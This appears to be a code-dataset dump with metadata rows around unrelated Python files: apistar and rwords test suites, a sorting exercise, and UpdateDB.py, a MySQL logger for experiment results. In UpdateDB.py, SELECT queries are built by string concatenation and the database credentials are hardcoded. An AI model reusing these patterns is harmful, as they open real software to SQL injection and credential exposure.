| 31.75 | 81 | 0.619685 | 729 | 6,350 | 5.153635 | 0.163237 | 0.113122 | 0.059888 | 0.079851 | 0.778014 | 0.772159 | 0.767368 | 0.760447 | 0.760447 | 0.760447 | 0 | 0.003156 | 0.301417 | 6,350 | 199 | 82 | 31.909548 | 0.843778 | 0.208819 | 0 | 0.65873 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005025 | 0 | 1 | 0.222222 | false | 0.198413 | 0.015873 | 0 | 0.269841 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
30158ba96830fa9b4f0cab993a15b0de56dda209 | 3,216 | py | Python | tests/test_inspect_app.py | jeffbuttars/apistar-autoapp | 0c00d7650cfa860eeab71e58fd5b30cd04a3f1a1 | [
"Apache-2.0"
] | 5 | 2018-05-30T12:47:18.000Z | 2018-06-17T07:11:11.000Z | tests/test_inspect_app.py | jeffbuttars/apistar-autoapp | 0c00d7650cfa860eeab71e58fd5b30cd04a3f1a1 | [
"Apache-2.0"
] | 3 | 2018-05-23T14:20:20.000Z | 2021-06-01T22:21:46.000Z | tests/test_inspect_app.py | jeffbuttars/apistar-autoapp | 0c00d7650cfa860eeab71e58fd5b30cd04a3f1a1 | [
"Apache-2.0"
] | null | null | null | import pytest
from apistar_autoapp.autoapp import inspect_app
def test_inspect_app_top():
with pytest.raises(TypeError):
res = inspect_app()
res = inspect_app(tuple())
assert res
assert res['routes'] == []
assert res['components'] == []
assert res['template_dir'] == []
assert res['packages'] == []
assert res['event_hooks'] == []
assert res['app_path'] == tuple()
def test_inspect_app_v1():
res = inspect_app(('tests', 'v1'))
assert res
assert res['routes'] == []
assert res['components'] == []
assert res['template_dir'] == []
assert res['packages'] == []
assert res['event_hooks'] == []
assert res['app_path'] == ('tests', 'v1')
def test_inspect_app_v2():
res = inspect_app(('tests', 'v2'))
assert res
assert res['routes'] == []
assert res['components'] == []
assert res['template_dir'] == []
assert res['packages'] == []
assert res['event_hooks'] == []
assert res['app_path'] == ('tests', 'v2')
def test_inspect_app_v1_subs():
res = inspect_app(('tests', 'v1', 'epone'))
assert res
assert res['routes'] == []
assert res['components'] == []
assert res['template_dir'] == []
assert res['packages'] == []
assert res['event_hooks'] == []
assert res['app_path'] == ('tests', 'v1', 'epone')
res = inspect_app(('tests', 'v1', 'eptwo'))
assert res
assert res['routes'] == []
assert res['components'] == []
assert res['template_dir'] == []
assert res['packages'] == []
assert res['event_hooks'] == []
assert res['app_path'] == ('tests', 'v1', 'eptwo')
res = inspect_app(('tests', 'v1', 'epthree'))
assert res
assert res['routes'] == []
assert res['components'] == []
assert res['template_dir'] == []
assert res['packages'] == []
assert res['event_hooks'] == []
assert res['app_path'] == ('tests', 'v1', 'epthree')
res = inspect_app(('tests', 'v1', 'deep'))
assert res
assert res['routes'] == []
assert res['components'] == []
assert res['template_dir'] == []
assert res['packages'] == []
assert res['event_hooks'] == []
assert res['app_path'] == ('tests', 'v1', 'deep')
def test_inspect_app_v2_subs():
res = inspect_app(('tests', 'v2', 'epone'))
assert res
assert res['routes'] == []
assert res['components'] == []
assert res['template_dir'] == []
assert res['packages'] == []
assert res['event_hooks'] == []
assert res['app_path'] == ('tests', 'v2', 'epone')
res = inspect_app(('tests', 'v2', 'eptwo'))
assert res
assert res['routes'] == []
assert res['components'] == []
assert res['template_dir'] == []
assert res['packages'] == []
assert res['event_hooks'] == []
assert res['app_path'] == ('tests', 'v2', 'eptwo')
res = inspect_app(('tests', 'v2', 'epthree'))
assert res
assert res['routes'] == []
assert res['components'] == []
assert res['template_dir'] == []
assert res['packages'] == []
assert res['event_hooks'] == []
assert res['app_path'] == ('tests', 'v2', 'epthree')
with pytest.raises(ModuleNotFoundError):
inspect_app(('tests', 'v2', 'empty'))
| 29.236364 | 56 | 0.561256 | 364 | 3,216 | 4.791209 | 0.093407 | 0.361239 | 0.081995 | 0.103211 | 0.877867 | 0.715023 | 0.715023 | 0.715023 | 0.715023 | 0.715023 | 0 | 0.009178 | 0.220771 | 3,216 | 109 | 57 | 29.504587 | 0.686752 | 0 | 0 | 0.659341 | 0 | 0 | 0.237562 | 0 | 0 | 0 | 0 | 0 | 0.769231 | 1 | 0.054945 | false | 0 | 0.021978 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
3020ce07eafce571ff7e32363f08a1b414810375 | 15,016 | py | Python | tests/store_test.py | Endlex-net/Rwords | dca9d9d7629ad943708aff91f3d4876a4b095ee4 | [
"MIT"
] | 5 | 2019-02-26T08:04:43.000Z | 2019-08-10T07:13:52.000Z | tests/store_test.py | Endlex-net/Rwords | dca9d9d7629ad943708aff91f3d4876a4b095ee4 | [
"MIT"
] | null | null | null | tests/store_test.py | Endlex-net/Rwords | dca9d9d7629ad943708aff91f3d4876a4b095ee4 | [
"MIT"
] | 2 | 2019-02-27T07:55:53.000Z | 2019-08-19T07:35:09.000Z | # -*- coding: utf-8 -*-
import json
import datetime
from rwords.store import word_store, review_list_store, word_factor_store
from rwords.models import Word, Mp3, WordFactor, ReviewList, OptimumFactorMatrix, TranMean
from rwords.core.db import session_scope
from tests import mock_info
class TestWordStore:
def test_create(self):
mock_word_info = mock_info.word_info
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_word_info['word_name']).delete()
session.commit()
word_id = word_store.create(
mock_word_info['word_name'],
mock_word_info['ph'],
mock_word_info['tran_means'],
mock_word_info['mp3_url'],
'',
)
word_obj = session.query(Word).filter_by(id=word_id).first()
assert word_obj.word_name == mock_word_info['word_name']
assert word_obj.ph == mock_word_info['ph']
tran_mean = word_obj.tran_means[0]
assert {'part': tran_mean.part, 'means': json.loads(tran_mean.means)} == mock_word_info['tran_means'][0]
assert word_obj.mp3.url == mock_word_info['mp3_url']
assert isinstance(word_obj.word_factor, WordFactor)
session.query(Mp3).filter_by(word_id=word_id).delete()
session.query(ReviewList).filter_by(word_id=word_id).delete()
session.delete(word_obj)
session.query(OptimumFactorMatrix).delete()
def test_get_word(self):
mock_word_info = mock_info.word_info
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_word_info['word_name']).delete()
word_id = word_store.create(
mock_word_info['word_name'],
mock_word_info['ph'],
mock_word_info['tran_means'],
mock_word_info['mp3_url'],
'',
)
word_info = word_store.get_word(id=word_id)
assert word_info['word_name'] == mock_word_info['word_name']
word_info = word_store.get_word(word=mock_word_info['word_name'])
assert word_info['ph'] == mock_word_info['ph']
with session_scope() as session:
session.query(Mp3).delete()
session.query(ReviewList).delete()
session.query(Word).delete()
session.query(OptimumFactorMatrix).delete()
def test_get_words(self):
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_info.word_info['word_name']).delete()
test_word_ids = []
for i in range(10):
word_id = word_store.create(
mock_info.word_info['word_name'] + str(i),
mock_info.word_info['ph'],
mock_info.word_info['tran_means'],
mock_info.word_info['mp3_url'],
'',
)
test_word_ids.append(word_id)
word_infos = word_store.get_words(ids=test_word_ids, start=2, end=6)
assert len(word_infos) == 4
with session_scope() as session:
session.query(Mp3).delete()
session.query(ReviewList).delete()
session.query(Word).delete()
session.query(OptimumFactorMatrix).delete()
def test_get_words_count(self):
with session_scope() as session:
session.query(Word).delete()
word_store.create(
mock_info.word_info['word_name'],
mock_info.word_info['ph'],
mock_info.word_info['tran_means'],
mock_info.word_info['mp3_url'],
'',
)
assert word_store.get_words_count() == 1
with session_scope() as session:
session.query(Mp3).delete()
session.query(TranMean).delete()
session.query(ReviewList).delete()
session.query(Word).delete()
session.query(WordFactor).delete()
session.query(OptimumFactorMatrix).delete()
def test_update_mp3(self):
mock_word_info = mock_info.word_info
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_word_info['word_name']).delete()
word_id = word_store.create(
mock_word_info['word_name'],
mock_word_info['ph'],
mock_word_info['tran_means'],
mock_word_info['mp3_url'],
'',
)
mock_path = '/data/mp3/mock.mp3'
mock_url = mock_word_info['mp3_url'] + 'mock'
word_store.update_mp3(id=word_id, path=mock_path, url=mock_url)
assert word_store.get_word(id=word_id)['mp3']['path'] == mock_path
assert word_store.get_word(id=word_id)['mp3']['url'] == mock_url
with session_scope() as session:
session.query(Mp3).delete()
session.query(ReviewList).delete()
session.query(Word).delete()
session.query(OptimumFactorMatrix).delete()
class TestReviewListStore:
def test_add_word_in_list(self):
mock_word_info = mock_info.word_info
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_word_info['word_name']).delete()
word_obj = Word(
word_name=mock_word_info['word_name'],
ph=mock_word_info['ph'],
)
session.add(word_obj)
session.flush()
word_id = word_obj.id
review_list_store.add_word_in_list(word_id, repeat_count=5)
with session_scope() as session:
assert session.query(ReviewList).filter_by(word_id=word_id).first().repeat_count == 5
with session_scope() as session:
session.query(Mp3).delete()
session.query(ReviewList).delete()
session.query(Word).delete()
session.query(OptimumFactorMatrix).delete()
def test_reduce_repeat_count(self):
mock_word_info = mock_info.word_info
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_word_info['word_name']).delete()
word_obj = Word(
word_name=mock_word_info['word_name'],
ph=mock_word_info['ph'],
)
session.add(word_obj)
session.flush()
word_id = word_obj.id
review_list_store.del_word_in_list(word_id)
review_list_store.add_word_in_list(word_id, new=False, repeat_count=2)
review_list_store.reduce_repeat_count(word_id)
with session_scope() as session:
assert session.query(ReviewList).filter_by(word_id=word_id).first().repeat_count == 1
review_list_store.reduce_repeat_count(word_id)
with session_scope() as session:
assert session.query(ReviewList).filter_by(word_id=word_id).first() is None
session.query(Mp3).delete()
session.query(ReviewList).delete()
session.query(Word).delete()
session.query(OptimumFactorMatrix).delete()
def test_del_word_in_list(self):
mock_word_info = mock_info.word_info
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_word_info['word_name']).delete()
word_obj = Word(
word_name=mock_word_info['word_name'],
ph=mock_word_info['ph'],
)
session.add(word_obj)
session.flush()
word_id = word_obj.id
review_list_store.del_word_in_list(word_id)
with session_scope() as session:
assert session.query(ReviewList).filter_by(word_id=word_id).first() is None
session.query(Mp3).delete()
session.query(ReviewList).delete()
session.query(Word).delete()
session.query(OptimumFactorMatrix).delete()
def test_get_a_word_id(self):
word_id = word_store.create(
mock_info.word_info['word_name'],
mock_info.word_info['ph'],
mock_info.word_info['tran_means'],
mock_info.word_info['mp3_url'],
'',
)
assert isinstance(review_list_store.get_a_word_id(), int)
with session_scope() as session:
session.query(Mp3).delete()
session.query(ReviewList).delete()
session.query(Word).delete()
session.query(TranMean).delete()
session.query(OptimumFactorMatrix).delete()
def test_get_word_type(self):
mock_word_info = mock_info.word_info
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_word_info['word_name']).delete()
word_obj = Word(
word_name=mock_word_info['word_name'],
ph=mock_word_info['ph'],
)
session.add(word_obj)
session.flush()
word_id = word_obj.id
review_list_store.add_word_in_list(word_id)
assert review_list_store.get_word_type(word_id) is ReviewList.WordType.review
with session_scope() as session:
session.query(Mp3).delete()
session.query(ReviewList).delete()
session.query(Word).delete()
session.query(OptimumFactorMatrix).delete()
class TestWordFactorStore:
def test_get_OF_matrix(self):
mock_word_info = mock_info.word_info
mock_OF_matrix = mock_info.OF_matrix
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_word_info['word_name']).delete()
word_id = word_store.create(
mock_word_info['word_name'],
mock_word_info['ph'],
mock_word_info['tran_means'],
mock_word_info['mp3_url'],
'',
)
with session_scope() as session:
word_factor_id = session.query(WordFactor).filter_by(word_id=word_id).first().id
OF_objs = [OptimumFactorMatrix(word_factor_id=word_factor_id, number=item[0], OF=item[1]) for item in
mock_OF_matrix]
session.add_all(OF_objs)
assert word_factor_store.get_OF_matrix(word_id) == mock_OF_matrix
with session_scope() as session:
session.query(Mp3).filter_by(word_id=word_id).delete()
session.query(ReviewList).filter_by(word_id=word_id).delete()
session.query(Word).filter_by(id=word_id).delete()
session.query(OptimumFactorMatrix).delete()
def test_get_EF(self):
mock_word_info = mock_info.word_info
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_word_info['word_name']).delete()
word_id = word_store.create(
mock_word_info['word_name'],
mock_word_info['ph'],
mock_word_info['tran_means'],
mock_word_info['mp3_url'],
'',
)
assert word_factor_store.get_EF(word_id) == 1.3
with session_scope() as session:
session.query(Mp3).filter_by(word_id=word_id).delete()
session.query(ReviewList).filter_by(word_id=word_id).delete()
session.query(Word).filter_by(id=word_id).delete()
session.query(OptimumFactorMatrix).delete()
def test_set_EF(self):
mock_word_info = mock_info.word_info
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_word_info['word_name']).delete()
word_id = word_store.create(
mock_word_info['word_name'],
mock_word_info['ph'],
mock_word_info['tran_means'],
mock_word_info['mp3_url'],
'',
)
word_factor_store.set_EF(word_id, 1.4)
assert word_factor_store.get_EF(word_id) == 1.4
with session_scope() as session:
session.query(Mp3).filter_by(word_id=word_id).delete()
session.query(ReviewList).filter_by(word_id=word_id).delete()
session.query(Word).filter_by(id=word_id).delete()
session.query(OptimumFactorMatrix).delete()
def test_set_OF_matrix(self):
mock_word_info = mock_info.word_info
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_word_info['word_name']).delete()
word_id = word_store.create(
mock_word_info['word_name'],
mock_word_info['ph'],
mock_word_info['tran_means'],
mock_word_info['mp3_url'],
'',
)
word_factor_store.set_OF_matrix(word_id, mock_info.OF_matrix)
assert word_factor_store.get_OF_matrix(word_id) == mock_info.OF_matrix
with session_scope() as session:
session.query(Mp3).filter_by(word_id=word_id).delete()
session.query(ReviewList).filter_by(word_id=word_id).delete()
session.query(Word).filter_by(id=word_id).delete()
session.query(OptimumFactorMatrix).delete()
def test_set_next_review_time(self):
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_info.word_info['word_name']).delete()
word_id = word_store.create(
mock_info.word_info['word_name'],
mock_info.word_info['ph'],
mock_info.word_info['tran_means'],
mock_info.word_info['mp3_url'],
'',
)
word_factor_store.set_next_review_time(word_id=word_id, next_review_time=mock_info.next_review_time)
with session_scope() as session:
assert session.query(WordFactor).filter_by(word_id=word_id).first().next_review_time == mock_info.next_review_time
session.query(Mp3).filter_by(word_id=word_id).delete()
session.query(ReviewList).filter_by(word_id=word_id).delete()
session.query(Word).filter_by(id=word_id).delete()
session.query(OptimumFactorMatrix).delete()
def test_get_today_word_ids(self):
with session_scope() as session:
session.query(Word).filter_by(word_name=mock_info.word_info['word_name']).delete()
word_id = word_store.create(
mock_info.word_info['word_name'],
mock_info.word_info['ph'],
mock_info.word_info['tran_means'],
mock_info.word_info['mp3_url'],
'',
session=session,
)
word_factor = session.query(WordFactor).filter_by(word_id=word_id).first()
word_factor.next_review_time = datetime.datetime.now()
assert word_factor_store.get_today_word_ids() == [word_id]
with session_scope() as session:
session.query(Mp3).filter_by(word_id=word_id).delete()
session.query(ReviewList).filter_by(word_id=word_id).delete()
session.query(WordFactor).filter_by(word_id=word_id).delete()
session.query(Word).filter_by(id=word_id).delete()
session.query(OptimumFactorMatrix).delete()
| 39.412073 | 126 | 0.620605 | 1,907 | 15,016 | 4.531201 | 0.054536 | 0.096285 | 0.091656 | 0.062956 | 0.866566 | 0.856845 | 0.839023 | 0.815878 | 0.780697 | 0.758824 | 0 | 0.005356 | 0.266383 | 15,016 | 380 | 127 | 39.515789 | 0.779049 | 0.001399 | 0 | 0.706625 | 0 | 0 | 0.041089 | 0 | 0 | 0 | 0 | 0 | 0.072555 | 1 | 0.050473 | false | 0 | 0.018927 | 0 | 0.078864 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
307efd07a51a0e0eb0b5ab215f81ee5e30890d47 | 11,747 | py | Python | fyp/UpdateDB.py | Ninad998/deepstylometry-python | 1cc9776d6624311a31f081852da9cbf08f23c350 | [
"MIT"
] | 1 | 2021-05-20T13:05:36.000Z | 2021-05-20T13:05:36.000Z | fyp/UpdateDB.py | ntungare/deepstylometry-python | 1cc9776d6624311a31f081852da9cbf08f23c350 | [
"MIT"
] | null | null | null | fyp/UpdateDB.py | ntungare/deepstylometry-python | 1cc9776d6624311a31f081852da9cbf08f23c350 | [
"MIT"
] | 1 | 2018-12-11T19:11:51.000Z | 2018-12-11T19:11:51.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function
import nltk.tokenize
import MySQLdb
import pandas as pd
import sys
def checkCNN(doc_id = 0, candidate = 4, dimensions = 200,
samples = 300, iterations = 180, dropout = 0.2,
test = 'Error', port = 3306):
conn = None
try:
conn = MySQLdb.connect(host="127.0.0.1", user="ninadt", passwd="ninadt", db="tests", port = port)
cursor = conn.cursor()
query = "SELECT * FROM readingsCNN WHERE doc_id = " + str(doc_id) + " AND candidates = " + str(candidate)
query += " AND dimensions = " + str(dimensions) + " AND samples = " + str(samples)
query += " AND iterations = " + str(iterations) + " AND dropout = " + str(dropout)
query += " AND test LIKE '%" + str(test) + "%' ;"
cursor.execute(query)
print("Execution completed")
rows = cursor.fetchall()
if (len(rows) > 0):
return True
else:
return False
except MySQLdb.Error as e:
if conn:
conn.rollback()
print('Error %s' % e)
sys.exit(1)
finally:
if conn is not None:
conn.close()
def updateresultCNN(doc_id = 0, candidate = 4, dimensions = 200,
samples = 300, iterations = 180, dropout = 0.2,
train_acc = 0.0, val_acc = 0.0,
test_acc = 0.0, test_bin = 0.0,
test = 'Error', port = 3306):
conn = None
try:
conn = MySQLdb.connect(host="127.0.0.1", user="ninadt", passwd="ninadt", db="tests", port = port)
cursor = conn.cursor()
query = "SELECT * FROM readingsCNN WHERE doc_id = " + str(doc_id) + " AND candidates = " + str(candidate)
query += " AND dimensions = " + str(dimensions) + " AND samples = " + str(samples)
query += " AND iterations = " + str(iterations) + " AND dropout = " + str(dropout)
query += " AND test LIKE '%" + str(test) + "%' ;"
cursor.execute(query)
print("Execution completed")
rows = cursor.fetchall()
if (len(rows) > 0):
return False
else:
cursor.execute("""INSERT INTO readingsCNN
(doc_id, candidates, dimensions, samples, iterations, dropout,
train_acc, val_acc, test_acc, test_bin, test)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s); """,
(str(doc_id), str(candidate), str(dimensions),
str(samples), str(iterations), str(dropout),
str(train_acc), str(val_acc),
str(test_acc), str(test_bin),
str(test)))
conn.commit()
return True
except MySQLdb.Error as e:
if conn:
conn.rollback()
print('Error %s' % e)
sys.exit(1)
finally:
if conn is not None:
conn.close()
def checkOldCNN(doc_id = 0, candidate = 4, dimensions = 200,
samples = 300, iterations = 180, dropout = 0.2,
test = 'Error', port = 3306):
conn = None
try:
conn = MySQLdb.connect(host="127.0.0.1", user="ninadt", passwd="ninadt", db="tests", port = port)
cursor = conn.cursor()
query = "SELECT * FROM readingsOldCNN WHERE doc_id = " + str(doc_id) + " AND candidates = " + str(candidate)
query += " AND dimensions = " + str(dimensions) + " AND samples = " + str(samples)
query += " AND iterations = " + str(iterations) + " AND dropout = " + str(dropout)
query += " AND test LIKE '%" + str(test) + "%' ;"
cursor.execute(query)
print("Execution completed")
rows = cursor.fetchall()
if (len(rows) > 0):
return True
else:
return False
except MySQLdb.Error as e:
if conn:
conn.rollback()
print('Error %s' % e)
sys.exit(1)
finally:
if conn is not None:
conn.close()
def updateresultOldCNN(doc_id = 0, candidate = 4, dimensions = 200,
samples = 300, iterations = 180, dropout = 0.2,
train_acc = 0.0, val_acc = 0.0,
test_acc = 0.0, test_bin = 0.0,
test = 'Error', port = 3306):
conn = None
try:
conn = MySQLdb.connect(host="127.0.0.1", user="ninadt", passwd="ninadt", db="tests", port = port)
cursor = conn.cursor()
query = "SELECT * FROM readingsOldCNN WHERE doc_id = " + str(doc_id) + " AND candidates = " + str(candidate)
query += " AND dimensions = " + str(dimensions) + " AND samples = " + str(samples)
query += " AND iterations = " + str(iterations) + " AND dropout = " + str(dropout)
query += " AND test LIKE '%" + str(test) + "%' ;"
cursor.execute(query)
print("Execution completed")
rows = cursor.fetchall()
if (len(rows) > 0):
return False
else:
cursor.execute("""INSERT INTO readingsOldCNN
(doc_id, candidates, dimensions, samples, iterations, dropout, train_acc, val_acc, test)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s); """,
(str(doc_id), str(candidate), str(dimensions),
str(samples), str(iterations), str(dropout),
str(train_acc), str(val_acc),
str(test)))
conn.commit()
return True
except MySQLdb.Error as e:
if conn:
conn.rollback()
print('Error %s' % e)
sys.exit(1)
finally:
if conn is not None:
conn.close()
def checkOldML(doc_id = 0, candidate = 4, samples = 300,
test = 'Error', port = 3306):
conn = None
try:
conn = MySQLdb.connect(host="127.0.0.1", user="ninadt", passwd="ninadt", db="tests", port = port)
cursor = conn.cursor()
query = "SELECT * FROM readingsOldML WHERE doc_id = " + str(doc_id) + " AND candidates = " + str(candidate)
query += " AND samples = " + str(samples)
query += " AND test LIKE '%" + str(test) + "%' ;"
cursor.execute(query)
print("Execution completed")
rows = cursor.fetchall()
if (len(rows) > 0):
return True
else:
return False
except MySQLdb.Error as e:
if conn:
conn.rollback()
print('Error %s' % e)
sys.exit(1)
finally:
if conn is not None:
conn.close()
def updateresultOldML(doc_id = 0, candidate = 4, dimensions = 200,
samples = 300, iterations = 180, dropout = 0.2,
train_acc = 0.0, val_acc = 0.0,
test_acc = 0.0, test_bin = 0.0,
test = 'Error', port = 3306):
conn = None
try:
conn = MySQLdb.connect(host="127.0.0.1", user="ninadt", passwd="ninadt", db="tests", port = port)
cursor = conn.cursor()
query = "SELECT * FROM readingsOldML WHERE doc_id = " + str(doc_id) + " AND candidates = " + str(candidate)
query += " AND samples = " + str(samples)
query += " AND test LIKE '%" + str(test) + "%' ;"
cursor.execute(query)
print("Execution completed")
rows = cursor.fetchall()
if (len(rows) > 0):
return False
else:
cursor.execute("""INSERT INTO readingsOldML
(doc_id, candidates, samples, train_acc, val_acc, test_acc, test_bin, test)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s); """,
(str(doc_id), str(candidate),
str(samples),
str(train_acc), str(val_acc),
str(test_acc), str(test_bin),
str(test)))
conn.commit()
return True
except MySQLdb.Error as e:
if conn:
conn.rollback()
print('Error %s' % e)
sys.exit(1)
finally:
if conn is not None:
conn.close()
def checkOldCNNDiffBoth(doc_id = 0, candidate = 4, dimensions = 200,
samples = 300, iterations = 180, dropout = 0.2,
test = 'Error', port = 3306):
conn = None
try:
conn = MySQLdb.connect(host="127.0.0.1", user="ninadt", passwd="ninadt", db="tests", port = port)
cursor = conn.cursor()
query = "SELECT * FROM readingsOldCNNDiffBoth WHERE doc_id = " + str(doc_id) + " AND candidates = " + str(candidate)
query += " AND dimensions = " + str(dimensions) + " AND samples = " + str(samples)
query += " AND iterations = " + str(iterations) + " AND dropout = " + str(dropout)
query += " AND test LIKE '%" + str(test) + "%' ;"
cursor.execute(query)
print("Execution completed")
rows = cursor.fetchall()
if (len(rows) > 0):
return True
else:
return False
except MySQLdb.Error as e:
if conn:
conn.rollback()
print('Error %s' % e)
sys.exit(1)
finally:
if conn is not None:
conn.close()
def updateresultOldCNNDiffBoth(doc_id = 0, candidate = 4, dimensions = 200,
samples = 300, iterations = 180, dropout = 0.2,
train_acc_cnn = 0.0, val_acc_cnn = 0.0,
test_acc_cnn = 0.0, test_bin_cnn = 0.0,
train_acc_ml = 0.0, val_acc_ml = 0.0,
test_acc_ml = 0.0, test_bin_ml = 0.0,
test = 'Error', port = 3306):
conn = None
try:
conn = MySQLdb.connect(host="127.0.0.1", user="ninadt", passwd="ninadt", db="tests", port = port)
cursor = conn.cursor()
query = "SELECT * FROM readingsOldCNNDiffBoth WHERE doc_id = " + str(doc_id) + " AND candidates = " + str(candidate)
query += " AND dimensions = " + str(dimensions) + " AND samples = " + str(samples)
query += " AND iterations = " + str(iterations) + " AND dropout = " + str(dropout)
query += " AND test LIKE '%" + str(test) + "%' ;"
cursor.execute(query)
print("Execution completed")
rows = cursor.fetchall()
if (len(rows) > 0):
return False
else:
cursor.execute("""INSERT INTO readingsOldCNNDiffBoth
(doc_id, candidates, dimensions, samples, iterations, dropout,
train_acc_cnn, val_acc_cnn, test_acc_cnn, test_bin_cnn,
train_acc_ml, val_acc_ml, test_acc_ml, test_bin_ml,
test)
VALUES (%s, %s, %s, %s, %s, %s,
%s, %s, %s, %s,
%s, %s, %s, %s,
%s); """,
(str(doc_id), str(candidate), str(dimensions),
str(samples), str(iterations), str(dropout),
str(train_acc_cnn), str(val_acc_cnn),
str(test_acc_cnn), str(test_bin_cnn),
str(train_acc_ml), str(val_acc_ml),
str(test_acc_ml), str(test_bin_ml),
str(test)))
conn.commit()
return True
except MySQLdb.Error as e:
if conn:
conn.rollback()
print('Error %s' % e)
sys.exit(1)
finally:
if conn is not None:
conn.close()
| 33.183616 | 124 | 0.497574 | 1,317 | 11,747 | 4.349279 | 0.073652 | 0.013617 | 0.018331 | 0.021648 | 0.90817 | 0.897346 | 0.897346 | 0.897346 | 0.897346 | 0.887395 | 0 | 0.031542 | 0.371159 | 11,747 | 353 | 125 | 33.27762 | 0.743874 | 0.003235 | 0 | 0.856061 | 0 | 0.011364 | 0.217135 | 0.005638 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030303 | false | 0.030303 | 0.018939 | 0 | 0.109848 | 0.064394 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
063434da84f34de703144d00bf5a06f571e102eb | 135 | py | Python | tfkit/model/tagcrf/__init__.py | fossabot/TFkit | aade08634171eaee41e3d687b0f65259bef8fe43 | [
"Apache-2.0"
] | null | null | null | tfkit/model/tagcrf/__init__.py | fossabot/TFkit | aade08634171eaee41e3d687b0f65259bef8fe43 | [
"Apache-2.0"
] | null | null | null | tfkit/model/tagcrf/__init__.py | fossabot/TFkit | aade08634171eaee41e3d687b0f65259bef8fe43 | [
"Apache-2.0"
] | null | null | null | from .dataloader import get_data_from_file_col, get_data_from_file, get_feature_from_data, preprocessing_data
from .model import Model
| 45 | 109 | 0.881481 | 22 | 135 | 4.909091 | 0.454545 | 0.222222 | 0.203704 | 0.277778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081481 | 135 | 2 | 110 | 67.5 | 0.870968 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
065a43f0da8be74309a4294ffb6b27605f261f46 | 376 | py | Python | chapter-13/exercise04.py | krastin/pp-cs3.0 | 502be9aac2d84215db176864e443c219e5e26591 | [
"MIT"
] | null | null | null | chapter-13/exercise04.py | krastin/pp-cs3.0 | 502be9aac2d84215db176864e443c219e5e26591 | [
"MIT"
] | null | null | null | chapter-13/exercise04.py | krastin/pp-cs3.0 | 502be9aac2d84215db176864e443c219e5e26591 | [
"MIT"
] | null | null | null | '''
[6, 5, 4, 3, 7, 1, 2]
Selection sort:
- [1, 6, 5, 4, 3, 7, 2]
- [1, 2, 6, 5, 4, 3, 7]
- [1, 2, 3, 6, 5, 4, 7]
- [1, 2, 3, 4, 6, 5, 7]
- [1, 2, 3, 4, 5, 6, 7]
- [1, 2, 3, 4, 5, 6, 7]
- [1, 2, 3, 4, 5, 6, 7]
Insertion sort:
- [5, 6, 4, 3, 7, 1, 2]
- [4, 5, 6, 3, 7, 1, 2]
- [3, 4, 5, 6, 7, 1, 2]
- [3, 4, 5, 6, 7, 1, 2]
- [1, 3, 4, 5, 6, 7, 2]
- [1, 2, 3, 4, 5, 6, 7]
''' | 18.8 | 23 | 0.329787 | 102 | 376 | 1.215686 | 0.098039 | 0.193548 | 0.241935 | 0.225806 | 0.66129 | 0.483871 | 0.483871 | 0.314516 | 0.314516 | 0.314516 | 0 | 0.381323 | 0.316489 | 376 | 20 | 24 | 18.8 | 0.101167 | 0.976064 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 1 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
88d979396a9fdd67ea25ac17745fc12ba171f18d | 13,465 | py | Python | archiv/tables.py | acdh-oeaw/4dpuzzle | 7856bbd82c7dfa8da1d5f1ad40593219a35b3cfe | [
"MIT"
